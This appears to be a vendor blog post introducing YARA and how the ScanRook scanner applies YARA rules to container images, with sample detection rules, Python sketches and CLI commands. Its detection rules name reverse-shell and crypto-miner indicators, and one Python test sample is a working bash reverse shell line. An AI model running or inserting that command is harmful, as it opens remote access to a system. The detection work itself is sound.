Deep scanning

What Is YARA and Why Security Teams Use It

Name: ScanRook
Author: ScanRook

YARA is often described as the pattern-matching Swiss Army knife of the security world. It gives analysts a simple, declarative language for writing rules that identify and classify files based on textual or binary patterns. From malware research labs to production CI/CD pipelines, YARA is one of the most widely deployed tools for detecting known threats inside artifacts of every kind.

History of YARA

YARA was created by Victor Alvarez while working at VirusTotal. He needed a way to describe malware families using textual or binary patterns so that samples could be classified automatically at scale. The project was released as open source, and its name is usually expanded as "Yet Another Recursive Acronym" or "Yet Another Ridiculous Acronym" -- a nod to the long tradition of recursive acronyms in computing.

Since its release, YARA has been adopted by security teams worldwide. Antivirus vendors, threat intelligence platforms, incident response teams, and open-source scanning tools all rely on YARA rules as a common language for expressing indicators of compromise. Its simplicity and flexibility have made it the de facto standard for file-level pattern matching in security operations.

How YARA Rules Work

A YARA rule has three main sections. The meta section contains descriptive information about the rule, such as its author, description, and threat category. The strings section defines the patterns to search for -- these can be plain text, hexadecimal byte sequences, or regular expressions. The condition section, the only one YARA requires, is a boolean expression that decides when the rule triggers: for example, all strings must match, at least one must match, or a minimum number must match.

rule detect_reverse_shell {
    meta:
        author = "security-team"
        description = "Detects common reverse shell patterns"
        severity = "critical"
    strings:
        $bash_tcp = "/dev/tcp/" ascii
        $nc_exec = "nc -e /bin" ascii
        $python_socket = "socket.socket" ascii
    condition:
        any of them
}

When YARA evaluates a file against this rule, it scans the file contents for the defined string patterns and evaluates the condition. If the condition is satisfied, the rule fires and the match is reported along with the rule's metadata.
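
The evaluation step can be approximated in a few lines of Python. This is a simplified emulation using only the standard library, not the YARA engine: the evaluate_rule function and its min_matches parameter are hypothetical names, and only plain ASCII strings are handled (no hex patterns, regular expressions, or modifiers).

```python
from __future__ import annotations


def evaluate_rule(data: bytes, strings: dict[str, bytes], min_matches: int = 1) -> list[str]:
    """Return the identifiers of matched strings if the condition holds, else [].

    min_matches=1 mimics "any of them"; min_matches=len(strings) mimics
    "all of them"; other values mimic "N of them".
    """
    matched = [name for name, pattern in strings.items() if pattern in data]
    return matched if len(matched) >= min_matches else []


# The strings section of detect_reverse_shell, as plain byte patterns.
REVERSE_SHELL_STRINGS = {
    "$bash_tcp": b"/dev/tcp/",
    "$nc_exec": b"nc -e /bin",
    "$python_socket": b"socket.socket",
}

sample = b"#!/bin/bash\nbash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n"
print(evaluate_rule(sample, REVERSE_SHELL_STRINGS))  # ['$bash_tcp']
```

Returning the matched identifiers rather than a bare boolean mirrors how a match is reported together with its evidence.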

Common Use Cases

YARA rules are used across a wide range of security workflows:

Malware detection -- identifying known malware families by their unique byte patterns, strings, or structural characteristics.
Incident response triage -- quickly classifying suspicious files during an investigation to determine what category of threat they belong to.
Threat hunting -- scanning file systems, network captures, and memory dumps for indicators of compromise that match known threat intelligence.
CI/CD security gates -- running YARA rules against build artifacts before deployment to catch threats that package-level scanning would miss.
Container image inspection -- scanning the full filesystem of a container image for malicious payloads that were injected during the build process or pulled in through compromised base images.

YARA in Container Scanning

Traditional container scanners focus almost exclusively on checking installed package versions against vulnerability databases like the NVD and OSV. This approach catches known CVEs in declared dependencies, but it has a blind spot: it cannot detect threats that exist as standalone files within the image filesystem.

YARA fills this gap by enabling detection of threats that package-level scanning misses entirely:

Embedded crypto miners -- binaries like xmrig or custom mining tools dropped into image layers.
Web shells -- PHP, JSP, or ASP scripts planted in web-accessible directories within application images.
Reverse shell backdoors -- scripts or binaries that establish outbound connections to attacker-controlled infrastructure.
Hardcoded secrets and API keys -- credentials embedded directly in configuration files or application code baked into the image.
Obfuscated malicious payloads -- base64-encoded or otherwise obfuscated code that YARA can detect through characteristic encoding patterns and entropy analysis.
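
Entropy in this context usually means the Shannon entropy of a file's byte distribution. Uniformly random bytes approach 8 bits per byte, while base64 text tops out at roughly 6 because it draws on about 64 symbols. The following Python sketch shows the calculation; the function name is illustrative, and inside real rules the equivalent check is typically expressed with YARA's math module rather than external code.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    # Sum p * log2(1/p) over every byte value that occurs in the data.
    return sum((n / total) * math.log2(total / n) for n in counts.values())


print(shannon_entropy(b"aaaa"))            # 0.0: a single repeated byte
print(shannon_entropy(bytes(range(256))))  # 8.0: every byte value equally likely
```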

How ScanRook Integrates YARA

ScanRook supports YARA scanning through its deep scan mode. When invoked with --mode deep, ScanRook extracts the full container filesystem from the image tar and applies YARA rules against every file in the extracted tree. This runs alongside the standard package-level vulnerability enrichment, so a single scan produces both CVE findings from package analysis and threat findings from YARA pattern matching.
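
ScanRook's own extraction code is not shown here, but the general technique can be sketched in Python. The example assumes an archive in the layout written by docker save (a top-level manifest.json listing layer tarballs, base layer first) and applies the standard whiteout conventions for deleted files. The function names are hypothetical, and symlinks, hard links, and file metadata are ignored for brevity.

```python
from __future__ import annotations

import io
import json
import posixpath
import tarfile

WHITEOUT_PREFIX = ".wh."
OPAQUE_MARKER = ".wh..wh..opq"


def _clean(name: str) -> str:
    """Normalize a tar member name to a relative POSIX path."""
    return posixpath.normpath(name).lstrip("/")


def remove_tree(files: dict[str, bytes], target: str) -> None:
    """Delete target and everything beneath it from the merged view."""
    prefix = target + "/"
    for path in [p for p in files if p == target or p.startswith(prefix)]:
        del files[path]


def apply_layer(layer: tarfile.TarFile, files: dict[str, bytes]) -> None:
    members = layer.getmembers()
    # Pass 1: whiteouts only affect content from lower layers, so apply them first.
    for member in members:
        directory, name = posixpath.split(_clean(member.name))
        if name == OPAQUE_MARKER:
            remove_tree(files, directory)  # hide the directory's earlier contents
        elif name.startswith(WHITEOUT_PREFIX):
            remove_tree(files, posixpath.join(directory, name[len(WHITEOUT_PREFIX):]))
    # Pass 2: add or overwrite the regular files this layer provides.
    for member in members:
        path = _clean(member.name)
        if member.isfile() and not posixpath.basename(path).startswith(WHITEOUT_PREFIX):
            files[path] = layer.extractfile(member).read()


def flatten_image(image_tar_path: str) -> dict[str, bytes]:
    """Merge the layers of a docker-save style archive into {path: contents}."""
    files: dict[str, bytes] = {}
    with tarfile.open(image_tar_path) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for layer_name in manifest[0]["Layers"]:
            # Reads each layer fully into memory; fine for a sketch, not for large images.
            layer_bytes = image.extractfile(layer_name).read()
            with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as layer:
                apply_layer(layer, files)
    return files
```

Each entry in the returned mapping is one file in the final filesystem, which is the set a per-file rule scan would iterate over.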

ScanRook ships with a set of bundled default rules that cover common threat categories including crypto miners, web shells, reverse shells, and credential patterns. For teams with their own threat intelligence, custom YARA rules can be supplied via the --yara path/to/rules/ flag. ScanRook will load all .yar and .yara files from the specified directory and apply them alongside the defaults.
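
As an illustration of that loading step, the Python sketch below collects rule files from a directory. It is not ScanRook's implementation: the function name is hypothetical, and it assumes the lookup is non-recursive and that extensions are compared case-insensitively.

```python
from __future__ import annotations

from pathlib import Path

RULE_SUFFIXES = {".yar", ".yara"}


def find_rule_files(rules_dir: str) -> list[Path]:
    """Return the .yar and .yara files directly inside rules_dir, sorted by path."""
    return sorted(
        p for p in Path(rules_dir).iterdir()
        if p.is_file() and p.suffix.lower() in RULE_SUFFIXES
    )
```

Sorting keeps the load order deterministic, which makes scan results easier to reproduce across runs.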

Example: Detecting a Crypto Miner

Consider a Docker image based on Alpine that has been tampered with to include an xmrig binary. The Dockerfile looks innocent -- it installs standard packages and copies application code -- but a compromised build step has embedded the mining binary at /usr/local/bin/.sysupdate. A standard package-version scanner would report zero findings because xmrig is not an installed package; it's a standalone binary dropped into the filesystem.

A YARA rule targeting crypto miners can match on characteristic strings like mining pool connection URLs, stratum protocol identifiers, or xmrig's own configuration keys:

rule crypto_miner_indicators {
    meta:
        description = "Detects crypto mining tool indicators"
        severity = "high"
    strings:
        $pool = "stratum+tcp://" ascii
        $xmrig = "xmrig" ascii nocase
        $mining = "mining.pool" ascii
        // Bitcoin-style Base58 address; a broad pattern, so it only counts alongside another indicator
        $wallet = /[13][a-km-zA-HJ-NP-Z1-9]{25,34}/ ascii
    condition:
        2 of them
}

When ScanRook runs a deep scan against the image tar, it extracts all layers, reconstructs the filesystem, and applies this rule against every file. The hidden binary at /usr/local/bin/.sysupdate matches on both the stratum protocol string and the xmrig identifier. ScanRook reports the finding with the matched rule name, the file path, and the matched strings as evidence, giving the security team exactly what they need to investigate and remediate.

Getting Started with YARA in ScanRook

Running a deep scan with YARA is straightforward. Pass --mode deep to enable filesystem-level scanning; the bundled rules apply by default, and --yara adds a directory of custom rules:

# Deep scan with bundled YARA rules
scanrook scan --file image.tar --mode deep --format json

# Deep scan with custom rules directory
scanrook scan --file image.tar --mode deep --yara ./my-rules/ --format json

# Deep scan, saving the JSON report to report.json
scanrook scan --file image.tar --mode deep --format json --out report.json

YARA findings appear in the report alongside CVE findings from package-level analysis. Each YARA finding includes the rule name, matched file path, matched strings, and the severity level defined in the rule's metadata. This gives teams a single, unified view of both known vulnerabilities and file-level threats in their container images.